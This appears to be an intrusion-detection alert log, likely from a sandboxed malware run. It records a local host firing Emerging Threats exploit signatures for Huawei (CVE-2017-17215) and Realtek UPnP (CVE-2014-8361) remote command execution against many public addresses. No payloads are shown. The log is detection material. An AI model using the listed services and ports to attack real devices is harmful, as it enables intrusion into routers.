                                      07/20/24-23:01:02.064358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3440237215192.168.2.23157.219.128.2
                                      07/20/24-23:01:00.641803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736837215192.168.2.23197.224.26.246
                                      07/20/24-23:01:59.593869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5660652869192.168.2.2324.65.233.168
                                      07/20/24-23:01:24.883171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034237215192.168.2.23197.77.35.64
                                      07/20/24-23:01:41.399866TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614410652869192.168.2.2349.9.206.193
                                      07/20/24-23:01:13.649188TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615191452869192.168.2.23205.132.5.218
                                      07/20/24-23:01:20.124696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323437215192.168.2.2341.237.97.145
                                      07/20/24-23:01:34.050672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338437215192.168.2.2341.220.117.2
                                      07/20/24-23:01:40.334934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4441237215192.168.2.23197.100.4.197
                                      07/20/24-23:01:43.978984TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615654252869192.168.2.23126.192.25.7
                                      07/20/24-23:01:42.101588TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5384852869192.168.2.23207.162.61.245
                                      07/20/24-23:01:44.059102TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4412852869192.168.2.23147.163.143.195
                                      07/20/24-23:01:34.062277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5405437215192.168.2.23160.103.123.17
                                      07/20/24-23:01:31.978141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4205437215192.168.2.23197.65.9.72
                                      07/20/24-23:01:44.565132TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25728252869192.168.2.23112.138.84.14
                                      07/20/24-23:01:45.735394TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614429852869192.168.2.23223.75.101.67
                                      07/20/24-23:01:08.957638TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4728852869192.168.2.2384.150.128.0
                                      07/20/24-23:01:56.270914TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5439652869192.168.2.23171.38.97.128
                                      07/20/24-23:01:49.138222TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5011452869192.168.2.2386.51.174.240
                                      07/20/24-23:01:41.366269TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614804252869192.168.2.23159.222.212.200
                                      07/20/24-23:01:31.976795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686637215192.168.2.23197.154.129.141
                                      07/20/24-23:01:46.019511TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3307252869192.168.2.23182.29.32.245
                                      07/20/24-23:01:00.639093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5208637215192.168.2.23197.182.113.83
                                      07/20/24-23:01:44.631448TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613452652869192.168.2.23133.122.43.145
                                      07/20/24-23:01:46.556921TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3993452869192.168.2.23190.183.92.200
                                      07/20/24-23:01:31.976984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865437215192.168.2.2376.88.28.157
                                      07/20/24-23:01:44.730531TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4579652869192.168.2.2381.144.207.10
                                      07/20/24-23:01:08.677485TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25727652869192.168.2.23111.252.253.89
                                      07/20/24-23:01:24.459589TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614327252869192.168.2.23179.40.74.15
                                      07/20/24-23:01:42.713313TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24079852869192.168.2.2379.42.102.158
                                      07/20/24-23:01:42.563729TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25940052869192.168.2.23104.27.90.68
                                      07/20/24-23:01:44.144821TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24036252869192.168.2.2312.65.191.23
                                      07/20/24-23:01:01.826098TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615926652869192.168.2.23135.23.236.194
                                      07/20/24-23:00:57.221557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4368037215192.168.2.23157.254.68.190
                                      07/20/24-23:01:08.683684TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3720652869192.168.2.23172.97.184.195
                                      07/20/24-23:01:31.322217TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25270252869192.168.2.2370.161.8.187
                                      07/20/24-23:01:41.882275TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613457252869192.168.2.23192.18.152.238
                                      07/20/24-23:01:27.730585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6051037215192.168.2.23157.89.78.68
                                      07/20/24-23:01:43.135089TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5744452869192.168.2.239.44.236.192
                                      07/20/24-23:01:45.862503TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23734652869192.168.2.23169.80.181.136
                                      07/20/24-23:01:40.343151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5837437215192.168.2.23157.145.121.60
                                      07/20/24-23:01:43.895586TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615213852869192.168.2.23171.210.7.241
                                      07/20/24-23:01:44.631925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3443852869192.168.2.23213.68.164.174
                                      07/20/24-23:01:45.092575TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4546852869192.168.2.23165.194.139.225
                                      07/20/24-23:01:53.735607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3989052869192.168.2.2339.212.80.61
                                      07/20/24-23:01:08.677485TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5427452869192.168.2.2375.16.13.92
                                      07/20/24-23:01:48.547161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615982052869192.168.2.23129.246.142.35
                                      07/20/24-23:00:57.222279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6015037215192.168.2.23157.12.120.37
                                      07/20/24-23:01:31.317774TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5187452869192.168.2.23220.87.191.244
                                      07/20/24-23:01:02.768078TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616048852869192.168.2.2386.86.67.253
                                      07/20/24-23:02:09.263272TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24381652869192.168.2.23210.49.56.86
                                      07/20/24-23:01:24.933370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4182837215192.168.2.23181.98.41.184
                                      07/20/24-23:01:32.076593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5301237215192.168.2.2341.72.207.45
                                      07/20/24-23:01:08.606848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3694852869192.168.2.23146.210.17.240
                                      07/20/24-23:01:45.540580TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614900452869192.168.2.23204.255.198.47
                                      07/20/24-23:01:42.129029TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4097852869192.168.2.23203.162.151.3
                                      07/20/24-23:01:42.422050TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615753452869192.168.2.2376.231.40.42
                                      07/20/24-23:01:13.694393TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615807652869192.168.2.23140.34.53.233
                                      07/20/24-23:01:59.513085TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615333452869192.168.2.2389.86.75.249
                                      07/20/24-23:01:59.707284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5204452869192.168.2.2366.82.21.101
                                      07/20/24-23:01:24.885895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4623037215192.168.2.23194.21.224.56
                                      07/20/24-23:01:04.049279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919837215192.168.2.2341.138.190.176
                                      07/20/24-23:01:03.290547TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613830852869192.168.2.23129.27.232.7
                                      07/20/24-23:01:21.931985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582037215192.168.2.23197.188.71.219
                                      07/20/24-23:01:07.022763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4424837215192.168.2.23157.79.183.3
                                      07/20/24-23:01:46.827502TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5508852869192.168.2.23110.40.238.120
                                      07/20/24-23:01:45.188773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4881852869192.168.2.2327.86.156.82
                                      07/20/24-23:02:00.668349TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5392452869192.168.2.2383.28.127.148
                                      07/20/24-23:01:00.639093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442037215192.168.2.23157.90.253.17
                                      07/20/24-23:01:43.147883TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613928452869192.168.2.23189.66.149.229
                                      07/20/24-23:01:40.334452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5621637215192.168.2.23144.60.118.98
                                      07/20/24-23:01:56.719998TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614066252869192.168.2.2375.93.244.9
                                      07/20/24-23:01:53.524925TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615921252869192.168.2.23209.44.4.130
                                      07/20/24-23:01:04.098909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5177837215192.168.2.2341.161.204.46
                                      07/20/24-23:01:41.419124TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3635852869192.168.2.23158.212.171.84
                                      07/20/24-23:01:56.504220TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25845252869192.168.2.2379.45.122.255
                                      07/20/24-23:01:41.960623TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5333452869192.168.2.23173.71.226.225
                                      07/20/24-23:01:49.631749TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615201452869192.168.2.23111.101.151.97
                                      07/20/24-23:01:42.827952TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24064852869192.168.2.23192.160.62.15
                                      07/20/24-23:01:01.150119TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614246452869192.168.2.23157.202.7.129
                                      07/20/24-23:01:53.863938TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615859452869192.168.2.2366.250.122.217
                                      07/20/24-23:01:48.181097TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4460452869192.168.2.23101.122.117.242
                                      07/20/24-23:01:58.031141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4856852869192.168.2.23208.24.236.236
                                      07/20/24-23:01:34.053061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4320237215192.168.2.23197.213.218.177
                                      07/20/24-23:01:14.164018TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613459252869192.168.2.2373.36.171.85
                                      07/20/24-23:01:41.299284TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615512252869192.168.2.23174.30.181.131
                                      07/20/24-23:01:00.640312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709637215192.168.2.23197.124.34.30
                                      07/20/24-23:01:04.160872TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614736052869192.168.2.2393.10.103.253
                                      07/20/24-23:01:08.650213TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23457652869192.168.2.2386.86.67.253
                                      07/20/24-23:01:44.888072TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5391852869192.168.2.23105.83.227.139
                                      07/20/24-23:01:41.245522TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615736252869192.168.2.23191.61.198.111
                                      07/20/24-23:01:43.001716TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3638852869192.168.2.23161.217.163.253
                                      07/20/24-23:01:52.482723TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4154052869192.168.2.23116.106.3.51
                                      07/20/24-23:01:27.677519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4030237215192.168.2.2392.112.157.125
                                      07/20/24-23:01:09.032669TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5431252869192.168.2.23100.7.167.160
                                      07/20/24-23:01:46.485082TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25143652869192.168.2.23109.104.48.215
                                      07/20/24-23:01:47.231819TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24589652869192.168.2.2394.187.41.215
                                      07/20/24-23:01:48.376233TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24213052869192.168.2.23101.42.79.184
                                      07/20/24-23:01:09.021221TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5996652869192.168.2.2343.227.14.32
                                      07/20/24-23:01:42.984532TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4068852869192.168.2.23124.13.0.132
                                      07/20/24-23:01:42.728248TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613764052869192.168.2.2385.109.146.148
                                      07/20/24-23:01:02.470704TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4581052869192.168.2.23129.194.41.40
                                      07/20/24-23:01:41.501891TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4677052869192.168.2.232.78.155.76
                                      07/20/24-23:01:42.612597TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4545652869192.168.2.23108.79.31.157
                                      07/20/24-23:01:48.124037TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3908652869192.168.2.23173.124.142.19
                                      07/20/24-23:01:11.635828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960837215192.168.2.2341.124.1.164
                                      07/20/24-23:01:48.986585TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5270652869192.168.2.23105.66.231.198
                                      07/20/24-23:01:09.027075TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4951652869192.168.2.23213.46.179.130
                                      07/20/24-23:01:43.978983TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5971852869192.168.2.2332.189.144.58
                                      07/20/24-23:01:53.459445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5091452869192.168.2.2380.12.29.225
                                      07/20/24-23:01:47.201912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5742052869192.168.2.23187.119.209.224
                                      07/20/24-23:01:21.952783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3667237215192.168.2.2341.202.148.115
                                      07/20/24-23:01:42.485253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5887652869192.168.2.23162.227.232.27
                                      07/20/24-23:01:41.295718TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615126652869192.168.2.2314.249.111.18
                                      07/20/24-23:01:42.622797TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615511652869192.168.2.23169.186.230.20
                                      07/20/24-23:01:44.954688TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613632252869192.168.2.23194.45.44.116
                                      07/20/24-23:01:51.354418TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24453452869192.168.2.23152.150.124.219
                                      07/20/24-23:01:31.331820TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4832852869192.168.2.23172.14.168.150
                                      07/20/24-23:01:46.844704TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24065652869192.168.2.23185.86.48.66
                                      07/20/24-23:01:41.956472TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5560852869192.168.2.2380.7.39.33
                                      07/20/24-23:01:24.915904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5141637215192.168.2.23197.139.170.13
                                      07/20/24-23:01:43.489480TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614567452869192.168.2.23106.236.204.67
                                      07/20/24-23:01:08.615260TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24610052869192.168.2.23209.154.77.145
                                      07/20/24-23:01:24.934977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4555437215192.168.2.23197.42.208.165
                                      07/20/24-23:01:02.355712TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613349452869192.168.2.23196.0.98.90
                                      07/20/24-23:00:59.185033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4282437215192.168.2.23139.165.159.227
                                      07/20/24-23:01:40.286738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283637215192.168.2.23197.208.250.204
                                      07/20/24-23:01:43.957856TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3988652869192.168.2.235.36.69.33
                                      07/20/24-23:01:56.999569TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23568252869192.168.2.2362.146.159.96
                                      07/20/24-23:01:56.510714TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25902652869192.168.2.23112.218.81.136
                                      07/20/24-23:01:50.951743TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4282652869192.168.2.23198.167.255.95
                                      07/20/24-23:01:51.172994TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4444452869192.168.2.2366.150.226.120
                                      07/20/24-23:01:24.876750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4066637215192.168.2.23206.180.101.209
                                      07/20/24-23:01:44.142024TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5776852869192.168.2.2354.188.109.169
                                      07/20/24-23:01:04.098080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5613637215192.168.2.2341.150.236.246
                                      07/20/24-23:01:47.870904TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613919452869192.168.2.2339.76.169.126
                                      07/20/24-23:01:49.198416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3303252869192.168.2.2351.131.43.210
                                      07/20/24-23:01:27.729822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3716037215192.168.2.23157.67.226.84
                                      07/20/24-23:01:51.979093TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4777252869192.168.2.239.97.212.169
                                      07/20/24-23:01:52.934726TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24699052869192.168.2.23139.163.81.215
                                      07/20/24-23:01:03.266392TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5140052869192.168.2.239.134.98.50
                                      07/20/24-23:01:46.530676TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5031652869192.168.2.23177.9.244.61
                                      07/20/24-23:01:52.838688TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25007652869192.168.2.23192.175.188.159
                                      07/20/24-23:01:34.045144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058637215192.168.2.23197.218.45.39
                                      07/20/24-23:02:05.374045TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5586852869192.168.2.2395.71.29.54
                                      07/20/24-23:01:47.807536TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613734452869192.168.2.23157.175.172.46
                                      07/20/24-23:01:45.407048TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23417052869192.168.2.2334.82.199.243
                                      07/20/24-23:01:25.146493TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614584652869192.168.2.23152.43.74.118
                                      07/20/24-23:01:27.666100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5207637215192.168.2.23197.156.176.6
                                      07/20/24-23:01:42.809716TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5555852869192.168.2.23200.107.251.119
                                      07/20/24-23:01:51.683848TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613989452869192.168.2.23201.63.23.173
                                      07/20/24-23:01:43.946379TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3498252869192.168.2.23221.195.227.25
                                      07/20/24-23:00:59.196993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4001037215192.168.2.23170.47.187.157
                                      07/20/24-23:01:08.640831TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3583452869192.168.2.23104.55.221.40
                                      07/20/24-23:01:44.706302TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3953452869192.168.2.23154.31.9.47
                                      07/20/24-23:01:20.149798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3793837215192.168.2.23157.253.8.89
                                      07/20/24-23:01:20.202325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414637215192.168.2.2341.130.131.66
                                      07/20/24-23:01:54.796749TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613346252869192.168.2.2343.18.71.244
                                      07/20/24-23:01:04.247958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6076037215192.168.2.23197.8.78.212
                                      07/20/24-23:01:48.083998TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6071852869192.168.2.2363.248.77.62
                                      07/20/24-23:01:57.465464TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614199452869192.168.2.2388.40.199.176
                                      07/20/24-23:01:31.986571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5063037215192.168.2.23118.50.177.22
                                      07/20/24-23:01:25.948093TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4381052869192.168.2.23109.162.13.246
                                      07/20/24-23:01:00.645051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5522837215192.168.2.231.136.199.61
                                      07/20/24-23:01:56.246775TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5967652869192.168.2.239.38.202.199
                                      07/20/24-23:01:20.175900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3730437215192.168.2.23197.199.249.9
                                      07/20/24-23:01:41.933600TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25758452869192.168.2.23174.56.140.249
                                      07/20/24-23:01:01.205395TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615708852869192.168.2.235.1.90.206
                                      07/20/24-23:01:52.343511TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4958452869192.168.2.23131.14.182.74
                                      07/20/24-23:01:24.904906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4162437215192.168.2.23119.175.95.208
                                      07/20/24-23:01:44.510114TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614398452869192.168.2.23113.178.52.80
                                      07/20/24-23:01:20.096752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710437215192.168.2.2348.147.199.167
                                      07/20/24-23:02:17.085116TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614807252869192.168.2.2357.122.183.186
                                      07/20/24-23:01:45.485100TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5375652869192.168.2.2362.42.246.19
                                      07/20/24-23:01:04.624022TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3767852869192.168.2.23104.75.200.235
                                      07/20/24-23:01:41.258403TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613389852869192.168.2.23200.70.243.196
                                      07/20/24-23:02:08.246802TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25022452869192.168.2.2383.250.249.17
